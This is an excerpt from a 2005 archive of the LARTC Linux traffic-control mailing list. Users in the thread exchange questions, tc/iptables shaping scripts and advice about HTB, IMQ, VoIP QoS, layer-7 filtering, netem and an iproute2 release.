| http://trekweb.com/~jasonb/articles/traffic_shaping/monitoring.html )

Thanks.. it will be useful!
I've just graphed it, and it seems ok.. I can see the root, the four
child (three are used to shape each one of the three lines we have, that
share the same shaper, one is used to put the traffic going from one of
the three local nets to the other, which I do not want to be shaped) and
their respective child, and finally the leaf classes (question: is it
necessary to attach a leaf sfq or pfifo class to make things work? I
guess no, it's just used to give fairness to each connection sent to
the class, right?)
I can also see the filters that use "mark" policy go directly to the root
class.
I did not understand exactly why filters are attached to the root qdisc,
and not to the qdisc they refer to, but I guess it's a correct behaviour
as I see it in every script around...
I'll try to see if I can understand a little more with the traffic graphs
too..

Thanks again,
Ricky

From register@flintz.de Sat Jan 22 20:58:52 2005
From: register@flintz.de (FB)
Date: Sat, 22 Jan 2005 21:58:52 +0100
Subject: [LARTC] Layer 7 packet classifier doesn't recognize packets sent by the router itself
Message-ID: <41F2BE8C.9050101@flintz.de>

Hi there,

I have a little problem. I had this some months ago but didn't solve it
back then. I have patched my kernel with Layer 7 support and patched my
iptables to support it, too.
Now I inserted this line in my firewall script on my router for testing
purpose:

$IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp -m layer7 --l7proto http -j DROP

It works, BUT only if the connection is established by a pc BEHIND the
router (the connection is blocked). If I try to establish a http
connection from the router itself it works completely (layer 7 is NOT
working, the connection is working, that's what I wanted to say *g*).
Now I changed the line above to this:

$IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp --dport 80 -j DROP

and see, it works in BOTH cases. But that's no solution as I need Layer 7
also for router-connections. I also tried ftp as layer7 protocol, same
thing.

Anyone has an idea why this is happening?

Thanks in advance.

-FB

From iavramop@Princeton.EDU Sun Jan 23 05:22:09 2005
From: iavramop@Princeton.EDU (Ioannis C Avramopoulos (iavramop@Princeton.EDU))
Date: Sun, 23 Jan 2005 00:22:09 -0500
Subject: [LARTC] Determing the pfifo backlog
Message-ID: <3d41a0ab2ae2.41f2ee31@Princeton.EDU>

Greetings -- in the "Linux Advanced Routing & Traffic Control HOWTO"
chapter 14.1 on bfifo/pfifo it says that: "you can use this qdisc to
determine the backlog on your interface". But it does not say exactly how.
Command [#tc -s qdisc ls] outputs the number of packets sent so far but
it does not output any info about the backlog.

My first question is whether a command exists that provides info
about the backlog.

My second question is whether a system call exists that provides this
info. I would like to be able to query on the backlog at real time
and invoking the shell on each such query sounds like a lot of overhead.

Kind regards,
Yannis

From vincent-perrier@club-internet.fr Sun Jan 23 08:26:55 2005
From: vincent-perrier@club-internet.fr (vincent perrier)
Date: Sun, 23 Jan 2005 09:26:55 +0100
Subject: [LARTC] Determing the pfifo backlog
In-Reply-To: <3d41a0ab2ae2.41f2ee31@Princeton.EDU>
References: <3d41a0ab2ae2.41f2ee31@Princeton.EDU>
Message-ID: <1106468815.5703.6.camel@localhost.localdomain>

> My first question is whether a command exists that provides info
> about the backlog.
>
> My second question is whether a system call exists that provides this
> info. I would like to be able to query on the backlog at real time
> and invoking the shell on each such query sounds like a lot of overhead.

If you can compile a modified kernel, you can have real time access to
the red qdisc backlog by using the soft at
http://www.rawsoft.org

I also think that real time info on the queues is very important and
should be accessible in an easier way.

From George Alexandru Dragoi Sun Jan 23 08:31:48 2005
From: George Alexandru Dragoi (George Alexandru Dragoi)
Date: Sun, 23 Jan 2005 10:31:48 +0200
Subject: [LARTC] Layer 7 packet classifier doesn't recognize packets sent by the router itself
In-Reply-To: <41F2BE8C.9050101@flintz.de>
References: <41F2BE8C.9050101@flintz.de>
Message-ID: <3063e50501230031234731e8@mail.gmail.com>

Try this

iptables -t mangle -N local
iptables -t mangle -A INPUT -i $INET_IFACE -j local
iptables -t mangle -A OUTPUT -o $INET_IFACE -j local
iptables -t mangle -A local -p tcp -m layer7 --l7proto http -j DROP

I only think it may work, I say this because local packets are passing
INPUT and OUTPUT, while routed packets will always pass POSTROUTING
(and l7-filter needs to make a match both ways: incoming and outgoing
packets)

On Sat, 22 Jan 2005 21:58:52 +0100, FB wrote:
> Hi there,
>
> I have a little problem. I had this some months ago but didn't solve it
> back then. I have patched my kernel with Layer 7 support and patched my
> iptables to support it, too.
> Now I inserted this line in my firewall script on my router for testing
> purpose:
>
> $IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp -m layer7
> --l7proto http -j DROP
>
> It works, BUT only if the connection is established by a pc BEHIND the
> router (the connection is blocked). If I try to establish a http
> connection from the router itself it works completely (layer 7 is NOT
> working, the connection is working, thats what I wanted to say *g*.
> Now I changed the line above to this:
>
> $IPTABLES -t mangle -A POSTROUTING -o $INET_IFACE -p tcp --dport 80 -j
> DROP
>
> and see, it works in BOTH cases. But thats no solution as I need Layer 7
> also for router-connections. I also tried ftp als layer7 protocol, same
> thing.
>
> Anyone has an idea why this is happening?
>
> Thanks in advance.
>
> -FB

--
Bla bla

From gspiliot@yahoo.com Sun Jan 23 14:14:35 2005
From: gspiliot@yahoo.com (George Spiliotis)
Date: Sun, 23 Jan 2005 06:14:35 -0800 (PST)
Subject: [LARTC] Shaping traffic with high priority hosts
Message-ID: <20050123141435.68417.qmail@web50409.mail.yahoo.com>

Dear all

My current setup is the following:

Normal Hosts --------+     eth0          eth1
                     |    +----------+
                     +-<->| F/W box  |--<-> Internet
                     |    +----------+
High priority hosts--+

My eth0 is a normal 100MBps LAN and my Internet connection is a 1Mbps
ADSL line.

What I want to achieve is to have normal hosts to share a big part of
the internet connection (say 700-800KBps) and have my bosses (the High
priority hosts) to 'feel' a snappy internet access WHEN they actually
decide to use the internet. The ideal situation will be to slow down
all normal hosts' traffic in order to serve our boss PCs only.

First of all what is the best way to limit the Internet line usage for
the normal hosts? I.e.
the summary of all the normal hosts' traffic from the Internet towards
the internal LAN should not exceed 700-800KBps. If I put traffic control
for eth0 (lan side) then, presumably, I only limit the speed with which
the packets leave the eth0 interface from the F/W. The speed of the
actual download will be 1Mbps till the internal queues of the F/W for
eth0 fill up plus the queues at my ISP fill up as well (way too much)...
Is it better to use IMQ?

Then when one of my boss PCs generates a HTTP request I need to put that
request in front of all other packets in the eth1 queue at the F/W to
get it quickly out to the internet and then I need to make sure that the
requested info will quickly enter my F/W from the internet and reach my
boss PC (i.e. minimal queueing at the ISP + fast delivery from the F/W).
In other words when the priority hosts start requesting traffic from the
internet I don't care for the normal hosts' traffic.

Any ideas on how to accomplish this? Any clues on tc planning and setup?
Any examples?

Thank you in advance,
George

From nug@sch.bme.hu Sun Jan 23 16:10:59 2005
From: nug@sch.bme.hu (Tóth Nándor)
Date: Sun, 23 Jan 2005 17:10:59 +0100
Subject: [LARTC] Shaping traffic with high priority hosts
In-Reply-To: <20050123141435.68417.qmail@web50409.mail.yahoo.com>
References: <20050123141435.68417.qmail@web50409.mail.yahoo.com>
Message-ID: <41F3CC93.4070905@sch.bme.hu>

Hi!

George Spiliotis wrote:
> Dear all
>
> My current setup is the following:
>
> Normal Hosts --------+     eth0          eth1
>                      |    +----------+
>                      +-<->| F/W box  |--<-> Internet
>                      |    +----------+
> High priority hosts--+

Your questions are very typical. It can be easily accomplished using HTB
on interface eth0. You do not need IMQ. There are numerous sites dealing
with this problem. For example:
http://luxik.cdi.cz/~devik/qos/htb/
http://www.knowplace.org/shaper/
Go and read them.

--
Regards,
Nandor

From riccardo@e4a.it Sun Jan 23 20:54:53 2005
From: riccardo@e4a.it (Riccardo Losselli)
Date: Sun, 23 Jan 2005 21:54:53 +0100
Subject: [LARTC] Info about VoiP Qos
In-Reply-To: <200501221311.32569.jasonb@edseek.com>
References: <41F28A25.1030108@e4a.it> <200501221311.32569.jasonb@edseek.com>
Message-ID: <41F40F1D.6030507@e4a.it>

Thanks again to Jason.. I plotted the classes and they are as I wished
them to be..
I also plotted the traffic, while heavily using the link.
I gave VoIP a 100Kbit rate (it needs between 80 and 90some) and it worked.
There are no visible spikes (traffic is not exactly flat, but variations
are minimal) and stay between 80Kbps and 90some.
So it should be fine.. traffic is prioritized, prio 1, while the other
traffic is 3 or more..
Leaf classes are sfq perturb 10

I still hear the pops..
If it can be a useful hint, the problem appears only when I'm called,
not when I call (I use two different servers when making calls and
receiving).
The only one who hears the pops is the one on the POTS phone that is
calling me, I do not hear any pop (but I guess it's because my link is
saturated upstream only)
At first I thought that it was a problem of the server used to call me,
but if I almost zero the non VoIP traffic the pops disappear...
Will test more...

Bye,
Ricky

From alaios@yahoo.com Mon Jan 24 10:53:36 2005
From: alaios@yahoo.com (Alaios)
Date: Mon, 24 Jan 2005 02:53:36 -0800 (PST)
Subject: [LARTC] greb + htb debug
Message-ID: <20050124105336.54049.qmail@web54705.mail.yahoo.com>

Good morning,
I want to enable some debug messages concerning htb and gred. The reason
is that I want to see the journey of the IP packet through the 2.6
kernel from the start to finish (ethernet interface up to htb and gred
classification).
In the sch_htc.c I have found the following

/* debugging support; S is subsystem, these are defined:
  0 - netlink messages
  1 - enqueue
  2 - drop & requeue
  3 - dequeue main
  4 - dequeue one prio DRR part
  5 - dequeue class accounting
  6 - class overlimit status computation
  7 - hint tree
  8 - event queue
 10 - rate estimator
 11 - classifier
 12 - fast dequeue cache

 L is level; 0 = none, 1 = basic info, 2 = detailed, 3 = full
 q->debug uint32 contains 16 2-bit fields one for subsystem starting
 from LSB
 */
#ifdef HTB_DEBUG
#define HTB_DBG_COND(S,L) (((q->debug>>(2*S))&3) >= L)
#define HTB_DBG(S,L,FMT,ARG...) if (HTB_DBG_COND(S,L)) \

but still I don't know what I should change in order to see debug
messages in my dmesg...
Also in the same file the following line exists

#define HTB_DEBUG 1 /* compile debugging support (activated by tc tool) */

Do you know how I can use the tc tool for viewing those debug messages?
Thx a lot

From alg0@iit.demokritos.gr Mon Jan 24 12:02:08 2005
From: alg0@iit.demokritos.gr (Antonios Chalkiopoulos)
Date: Mon, 24 Jan 2005 14:02:08 +0200
Subject: [LARTC] tc filter change/replace
In-Reply-To: <20050123060247.15951.84291.Mailman@outpost.ds9a.nl>
References: <20050123060247.15951.84291.Mailman@outpost.ds9a.nl>
Message-ID: <200501241402.08307.alg0@iit.demokritos.gr>

I am wondering whether the commands 'tc filter change' and 'tc filter
replace' are working. Googling around revealed a few emails on the LARTC
stating that unfortunately they do not work. A quick check showed that
they are still not implemented (properly).

Some propose a solution to build a second tree of filters and apply the
2nd one when a need for it arises. However how can someone achieve the
above trick?

Any answer is welcome.

Thanks,
Antonio & Alex

From ixen2@o2.pl Mon Jan 24 14:08:57 2005
From: ixen2@o2.pl (Ixen Gerthannes)
Date: Mon, 24 Jan 2005 15:08:57 +0100
Subject: [LARTC] Htb, imq and sfq traffic shaping
Message-ID: <20050124150857.7d530d34@drak.aard.net>

Hello,
I wrote a simple traffic shaping script (below) that should have allowed
me to shape my internet traffic a bit (ppp0 - adsl 128kbit/64kbit; local
interface eth0).
The script works only partially - the speed is being limited but too
much. Without running this script my download rate is about 10kBytes
(with second computer also downloading at about 6kBytes). After running
it my download speed decreases to about 1..2kBytes and so the second
computer.
Could you tell me what have I done wrong?

Thank you for replies.
Ixen

--------------
My configuration:
Celeron 450MHz, 256MB RAM
Kernel 2.6.9 patched for imq support (imq devices compiled into kernel)
iptables 1.2.11 (also patched for imq)

Script:
#!/bin/sh

DOWNIF='imq0'
UPIF='imq1'
rc_done=" done"
rc_failed=" failed"

TC='/sbin/tc'
IPTABLES='/usr/sbin/iptables'
IFCONFIG='/sbin/ifconfig'
MODPROBE='/sbin/modprobe'

return=$rc_done

tc_reset ()
{
    # remove old devices if any
    echo "Removing old root qdisc..."
    $TC qdisc del dev $DOWNIF root
    $TC qdisc del dev $UPIF root
}

tc_status ()
{
    echo "========================================"
    echo "[qdisc - $DOWNIF]"
    $TC -s qdisc show dev $DOWNIF
    echo "[qdisc - $UPIF]"
    $TC -s qdisc show dev $UPIF
    echo "----------------------------------------"
    echo
    echo "[class - $DOWNIF]"
    $TC -s class show dev $DOWNIF
    echo "[class - $UPIF]"
    $TC -s class show dev $UPIF
}

tc_showfilter ()
{
    echo "[filter - $DOWNIF]"
    $TC -s filter show dev $DOWNIF
    echo "[filter - $UPIF]"
    $TC -s filter show dev $UPIF
}

case "$1" in

start)
    echo "Starting traffic shaping..."
    tc_reset
    # setup imq devices - imq0 for download, imq1 for upload
    # $MODPROBE imq numdevs 2
    $IFCONFIG imq0 up
    $IFCONFIG imq1 up

    # ROOT DEVICE
    echo " Setting root devices for $DOWNIF and $UPIF"
    # download
    $TC qdisc add dev $DOWNIF root handle 1: htb default 99
    $TC qdisc add dev $DOWNIF parent 1: classid 1:10 htb rate 128kbit
    # upload
    $TC qdisc add dev $UPIF root handle 1: htb default 98
    $TC class add dev $UPIF parent 1: classid 1:20 htb rate 64kbit

    # ADDRESSES
    echo " 192.168.0.30"
    # 192.168.0.30
    $TC class add dev $DOWNIF parent 1:10 classid 1:1000 htb rate 48kbit ceil 128kbit
    $TC qdisc add dev $DOWNIF parent 1:1000 handle 1000 sfq
    $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1000 fw classid 1:1000
    $TC class add dev $UPIF parent 1:20 classid 1:2000 htb rate 24kbit ceil 64kbit
    $TC qdisc add dev $UPIF parent 1:2000 handle 2000 sfq
    $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2000 fw classid 1:2000
    $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.30 -j MARK --set-mark 1000
    $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.30 -j MARK --set-mark 2000

    # 192.168.0.178
    echo " 192.168.0.178"
    $TC class add dev $DOWNIF parent 1:10 classid 1:1010 htb rate 16kbit ceil 100kbit
    $TC qdisc add dev $DOWNIF parent 1:1010 handle 1010 sfq
    $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1010 fw classid 1:1010
    $TC class add dev $UPIF parent 1:20 classid 1:2010 htb rate 8kbit ceil 60kbit
    $TC qdisc add dev $UPIF parent 1:2010 handle 2010 sfq
    $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2010 fw classid 1:2010
    $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.178 -j MARK --set-mark 1010
    $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.178 -j MARK --set-mark 2010

    # 192.168.0.55
    echo " 192.168.0.55"
    $TC class add dev $DOWNIF parent 1:10 classid 1:1020 htb rate 16kbit ceil 100kbit
    $TC qdisc add dev $DOWNIF parent 1:1020 handle 1020 sfq
    $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1020 fw classid 1:1020
    $TC class add dev $UPIF parent 1:20 classid 1:2020 htb rate 8kbit ceil 60kbit
    $TC qdisc add dev $UPIF parent 1:2020 handle 2020 sfq
    $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2020 fw classid 1:2020
    $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.55 -j MARK --set-mark 1020
    $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.55 -j MARK --set-mark 2020

    # other
    echo " other..."
    $TC class add dev $DOWNIF parent 1:10 classid 1:99 htb rate 100bit ceil 8kbit
    $TC class add dev $UPIF parent 1:20 classid 1:98 htb rate 100bit ceil 8kbit

    # route traffic
    echo " Traffic redirecting"
    # download
    $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.0/24 -j IMQ --todev 0
    #upload
    $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.0/24 -j IMQ --todev 1
    tc_status
    ;;

stop)
    echo -n "Stopping traffic shaper..."
    tc_reset || return=$rc_failed
    echo -e "$return"
    ;;

restart|reload)
    $0 stop && $0 start || return=$rc_failed
    ;;

stats|status)
    tc_status
    ;;

filter)
    tc_showfilter
    ;;

*)
    echo "Usage: $0 {start|stop|restart|stats|filter}"
esac

From George Alexandru Dragoi Mon Jan 24 17:26:24 2005
From: George Alexandru Dragoi (George Alexandru Dragoi)
Date: Mon, 24 Jan 2005 19:26:24 +0200
Subject: [LARTC] Htb, imq and sfq traffic shaping
In-Reply-To: <20050124150857.7d530d34@drak.aard.net>
References: <20050124150857.7d530d34@drak.aard.net>
Message-ID: <3063e505012409264f31331d@mail.gmail.com>

I didn't look much on your script (my brain is not that good compiler),
but looking at your default classes and what is happening with you, I
think the filters are not working on you, and everything goes to default
classes. If so, removing the default classes will make everything work
at maximum speed.

On Mon, 24 Jan 2005 15:08:57 +0100, Ixen Gerthannes wrote:
> Hello,
> I wrote a simple traffic shaping script (below) that should have allowed me to shape my internet traffic a bit (ppp0 - adsl 128kbit/64kbit; local interface eth0).
> The script works only partially - the speed is being limited but too much. Without running this script my download rate is about 10kBytes (with second computer also downloading at about 6kBytes). After running it my download speed decreases to about 1..2kBytes and so the second computer.
> Could you tell me what have I done wrong ?
>
> Thank you for replies.
> Ixen
>
> --------------
> My configuration:
> Celeron 450MHz, 256MB RAM
> Kernel 2.6.9 patched for imq support (imq devices compiled into kernel)
> iptables 1.2.11 (also patched for imq)
>
> Script:
> #!/bin/sh
>
> DOWNIF='imq0'
> UPIF='imq1'
> rc_done=" done"
> rc_failed=" failed"
>
> TC='/sbin/tc'
> IPTABLES='/usr/sbin/iptables'
> IFCONFIG='/sbin/ifconfig'
> MODPROBE='/sbin/modprobe'
>
> return=$rc_done
>
> tc_reset ()
> {
> # remove old devices if any
> echo "Removing old root qdisc..."
> $TC qdisc del dev $DOWNIF root
> $TC qdisc del dev $UPIF root
> }
>
> tc_status ()
> {
> echo "========================================"
> echo "[qdisc - $DOWNIF]"
> $TC -s qdisc show dev $DOWNIF
> echo "[qdisc - $UPIF]"
> $TC -s qdisc show dev $UPIF
> echo "----------------------------------------"
> echo
> echo "[class - $DOWNIF]"
> $TC -s class show dev $DOWNIF
> echo "[class - $UPIF]"
> $TC -s class show dev $UPIF
> }
>
> tc_showfilter ()
> {
> echo "[filter - $DOWNIF]"
> $TC -s filter show dev $DOWNIF
> echo "[filter - $UPIF]"
> $TC -s filter show dev $UPIF
> }
>
> case "$1" in
>
> start)
> echo "Starting traffic shaping..."
> tc_reset > > # setup imq devices - imq0 for download, imq1 for upload > # $MODPROBE imq numdevs 2 > > $IFCONFIG imq0 up > $IFCONFIG imq1 up > > # ROOT DEVICE > echo " Setting root devices for $DOWNIF and $UPIF" > > # download > $TC qdisc add dev $DOWNIF root handle 1: htb default 99 > $TC qdisc add dev $DOWNIF parent 1: classid 1:10 htb rate 128kbit > # upload > $TC qdisc add dev $UPIF root handle 1: htb default 98 > $TC class add dev $UPIF parent 1: classid 1:20 htb rate 64kbit > > # ADDRESSES > echo " 192.168.0.30" > # 192.168.0.30 > $TC class add dev $DOWNIF parent 1:10 classid 1:1000 htb rate 48kbit ceil 128kbit > $TC qdisc add dev $DOWNIF parent 1:1000 handle 1000 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1000 fw classid 1:1000 > > $TC class add dev $UPIF parent 1:20 classid 1:2000 htb rate 24kbit ceil 64kbit > $TC qdisc add dev $UPIF parent 1:2000 handle 2000 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2000 fw classid 1:2000 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.30 -j MARK --set-mark 1000 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.30 -j MARK --set-mark 2000 > > # 192.168.0.178 > echo " 192.168.0.178" > $TC class add dev $DOWNIF parent 1:10 classid 1:1010 htb rate 16kbit ceil 100kbit > $TC qdisc add dev $DOWNIF parent 1:1010 handle 1010 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1010 fw classid 1:1010 > > $TC class add dev $UPIF parent 1:20 classid 1:2010 htb rate 8kbit ceil 60kbit > $TC qdisc add dev $UPIF parent 1:2010 handle 2010 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2010 fw classid 1:2010 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.178 -j MARK --set-mark 1010 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.178 -j MARK --set-mark 2010 > > # 192.168.0.55 > echo " 192.168.0.55" > $TC class add dev $DOWNIF parent 1:10 classid 1:1020 htb rate 16kbit ceil 100kbit > $TC qdisc add dev $DOWNIF parent 1:1020 handle 
1020 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1020 fw classid 1:1020 > > $TC class add dev $UPIF parent 1:20 classid 1:2020 htb rate 8kbit ceil 60kbit > $TC qdisc add dev $UPIF parent 1:2020 handle 2020 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2020 fw classid 1:2020 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.55 -j MARK --set-mark 1020 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.55 -j MARK --set-mark 2020 > > # other > echo " other..." > $TC class add dev $DOWNIF parent 1:10 classid 1:99 htb rate 100bit ceil 8kbit > $TC class add dev $UPIF parent 1:20 classid 1:98 htb rate 100bit ceil 8kbit > > # route traffic > echo " Traffic redirecting" > # download > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.0/24 -j IMQ --todev 0 > #upload > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.0/24 -j IMQ --todev 1 > > tc_status > ;; > > stop) > echo -n "Stopping traffic shaper..." > tc_reset || return=$rc_failed > echo -e "$return" > ;; > > restart|reload) > $0 stop && $0 start || return=$rc_failed > ;; > > stats|status) > tc_status > ;; > > filter) > tc_showfilter > ;; > > *) > echo "Usage: $0 {start|stop|restart|stats|filter}" > esac > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > -- Bla bla From shemminger@osdl.org Mon Jan 24 17:59:28 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Mon, 24 Jan 2005 09:59:28 -0800 Subject: [LARTC] network emulation In-Reply-To: <20050122134619.18266.qmail@web50407.mail.yahoo.com> References: <20050122134619.18266.qmail@web50407.mail.yahoo.com> Message-ID: <20050124095928.14887106@dxpl.pdx.osdl.net> On Sat, 22 Jan 2005 05:46:19 -0800 (PST) vinay mathew wrote: > hi, > I am really a newbie in linux traffic control.But i have task to implement a tool similar to > the nistnet tool used for netwok emulation tests but which emulates a wireless 
environment. > I was exploring the use of the traffic control subsystem for this task.In this regard i have > a few questions i need to post in order to clarify my thoughts on how to do this.I am using > tcng to classify traffic and generate the commands necessary to set up the traffic control > structures. > > 1. A simple task to add say a delay of 10ms to packets goin to a particular destination.I > tried this using a simple fifo queue and a tbf queue but was not able to obtain the required > results.The queue parameters dont have an explicit delay/latency parameter so basically i > want to know how to add a delay/latency to packets goin out thro a particular interface. > A simple script that i tried Use netem (http://developer.osdl.org/shemminger/netem) it is already in 2.6.8 > > 2.The second part is similar to the first but involves dropping a percentage of packets > instead of adding a delay to them.Example i need a 10% packet drop for packets coming from > source 1 and heading to dest 2. Example i use a simple fifo queue with a limit of 2 kB in > order to just test random drop capability.When i use the ping utility with a packet size > greater than 2kB i get the message that 0 packets sent and 0 packets received and when the > packet sizes are < 2048 bytes then there is no drop or delay at all.Ne ideas on this one. ditto > 3.To implement bandwidth sharing among different hosts.Example 4 hosts are communicating to each other and all traffic between them is routed through a router which is like the > bottleneck and acts as the wireless network environment with the bottleneck capacity as the > known wireless link capacity.I was thinking and am currently trying this using the HTB > queuing discipline.I wanted to know if this idea can be effectively implemented using the > HTB queuing discipline. 
> > Also im having some problems with installation and working of tcng on my Suse 9.2 system > which is running with a 2.6.8 kernel version.Ok the simulator could not be compiled. But > when i tried using the commands generated by the tcng compiler i get the error that dsmark > queuing discipline is not supported.However when i use the root keyword using the tc tool there seems to be no problem.I read that root and dsmark are the same ...or am i wrong about this. Also my kernel has all the parameters enabled for QoS support.I tried compiling iproute2 from source but im not able to since im getting errors while compiling.Can neone throw some light on this.Or is it that there are some compatibility problems with the newer 2.6 kernels. > Im sorry for the long content of the mail.But im a newbie and want to get my thoughts rite > on this and whether its possible.Thanx a million in advance. > regards > vinay Tcng depends on tclsim as part of the build process but it doesn't seem to build on 2.6. > __________________________________________________ > Do You Yahoo!? > Tired of spam? Yahoo! Mail has the best spam protection around > http://mail.yahoo.com -- Stephen Hemminger From register@flintz.de Mon Jan 24 18:45:52 2005 From: register@flintz.de (FB) Date: Mon, 24 Jan 2005 19:45:52 +0100 Subject: [LARTC] Layer 7 packet classifier doesn't recognize packets sent by the router itself In-Reply-To: <3063e50501230031234731e8@mail.gmail.com> References: <41F2BE8C.9050101@flintz.de> <3063e50501230031234731e8@mail.gmail.com> Message-ID: <41F54260.9010601@flintz.de> Thanks! Now it works :) But I have another little problem: I need 2(3) different chains (one for traffic only from the router (done by this chain), one for the complete traffic generatet from router AND computers behind the router and one for connections only established from computers behind the router). Any ideas how to accomplish that? 
-FB

George Alexandru Dragoi wrote:
> Try this
> iptables -t mangle -N local
>
> iptables -t mangle -A INPUT -i $INET_IFACE -j local
> iptables -t mangle -A OUTPUT -o $INET_IFACE -j local
>
> iptables -t mangle -A local -p tcp -m layer7 --l7proto http -j DROP
>
> I only think it may work, i say this because local packets are passing
> INPUT and OUTPUT, while routed packets will always pass POSTROUTING
> (and l7-filter need to make a match both ways: incoming and outgoing
> packets)

From tgraf@suug.ch Mon Jan 24 19:24:47 2005
From: tgraf@suug.ch (Thomas Graf)
Date: Mon, 24 Jan 2005 20:24:47 +0100
Subject: [LARTC] tc filter change/replace
In-Reply-To: <200501241402.08307.alg0@iit.demokritos.gr>
References: <20050123060247.15951.84291.Mailman@outpost.ds9a.nl> <200501241402.08307.alg0@iit.demokritos.gr>
Message-ID: <20050124192447.GW23931@postel.suug.ch>

* Antonios Chalkiopoulos <200501241402.08307.alg0@iit.demokritos.gr> 2005-01-24 14:02
>
> I am wondering whether the commands 'tc filter change' and 'tc filter replace'
> are working. Googling around revealed a few emails on the LARTC stating that
> unfortunately they do not work. A quick check showed that they are still not
> implemented (properly).
> Some propose a solution to build a second tree of filters and apply the 2nd
> one when a need for it arises. However how can someone achieve the above trick.

All classifiers except rsvp are changeable in the latest bk. The
patchset has gone in around rc1-bk3-5.

From lists@wildgooses.com Mon Jan 24 22:32:11 2005
From: lists@wildgooses.com (Ed Wildgoose)
Date: Mon, 24 Jan 2005 22:32:11 +0000
Subject: [LARTC] Info about VoiP Qos
In-Reply-To: <41F28A25.1030108@e4a.it>
References: <41F28A25.1030108@e4a.it>
Message-ID: <41F5776B.3070000@wildgooses.com>

> But i would like to have the possibility to use all the 400Kbps and slow
> down server traffic only when and if needed.
>
> I prioritized VoIP traffic, using the various scripts around, and what i
> get is that, even if voip quality is definitely much much better than
> without shaping, there are still statics and pops, and some
> interruption of the voice and only if i'm called from POTS
> I do not get this when completely reserving the bandwidth or when the
> link is not loaded.

You probably forgot to tweak the HTB code to change the hysteresis value? This helps a lot with the output stuff.

However, remember that you always have to slow down the incoming to a little less than max otherwise by the time the stuff is throttled you see some small amount of queuing at the remote end.

Also remember that the bandwidth of most adsl links is less than the stated bandwidth. This is because of ATM overheads (which vary depending on packet size) and also because the link is contended.

Put this all together and you should be able to get pretty close to maximum, perhaps only reserving a small amount of bandwidth and make the rest shareable.

Good luck

Ed W

From shemminger@osdl.org Tue Jan 25 00:27:41 2005
From: shemminger@osdl.org (Stephen Hemminger)
Date: Mon, 24 Jan 2005 16:27:41 -0800
Subject: [LARTC] [ANNOUNCE] iproute2 (050124) release
Message-ID: <20050124162741.41606e3f@dxpl.pdx.osdl.net>

Thanks to the work of Jamal and Thomas; here is an update to iproute2.
http://developer.osdl.org/dev/iproute2/download/iproute2-2.6.10-ss050124.tar.gz

Changes since last version:

[Yun Mao]
    fix typo in ss

[Thomas Graf]
    tc pedit/action cleanups
    add addraw_l
    rtattr_parse cleanups

[Jamal Hadi Salim]
    typo in m_mirred
    add support for pedit

[Jim Gifford]
    Fix allocation size error in normal and paretonormal generation programs.
-- Stephen Hemminger From riccardo@e4a.it Tue Jan 25 09:47:57 2005 From: riccardo@e4a.it (Riccardo Losselli) Date: Tue, 25 Jan 2005 10:47:57 +0100 Subject: [LARTC] Info about VoiP Qos In-Reply-To: <41F58FE9.7050505@wildgooses.com> References: <41F28A25.1030108@e4a.it> <41F5776B.3070000@wildgooses.com> <41F579FD.9000000@e4a.it> <41F58FE9.7050505@wildgooses.com> Message-ID: <41F615CD.4040803@e4a.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Ed Wildgoose wrote: | Please reply onlist in general | Sorry, i didn't notice the answer went to you only.. i did the same mistake with Jason. | Check the HTB code in iproute and look for the "hysteris" variable. | Basically it just lets a couple of packets burst out at the same time | instead of doinga very granular per packet throttling. ok.. | Find out what the protocol is on the line. ADSL for example uses ATM to | encapsulate each packet. YOu buy 512Kbs of ATM bandwidth, which | actually works out as somewhat less TCP bandwidth (which is what you are | throttling). So do some speed tests on the line and work out the REAL | speed of the line. Preferably use small packets since the overhead of | encapsulation often shoots up then. | | This might not be relevant though - just a warning though I understand it's a frame relay | I meant, reserve (say) 10Kbs, and only share the rest... I see.. this way it works. Things are getting a little more complicated though.. I tested with some people, calling ip to ip, and it works just fine. I understand that, if it's just a matter of my bandwith being overloaded and not correctly shaped i should get the same disturbs, but i do not. I suspect there is something involved on the server that converts the call from ip to POTS and vice versa too.. Thanks! 
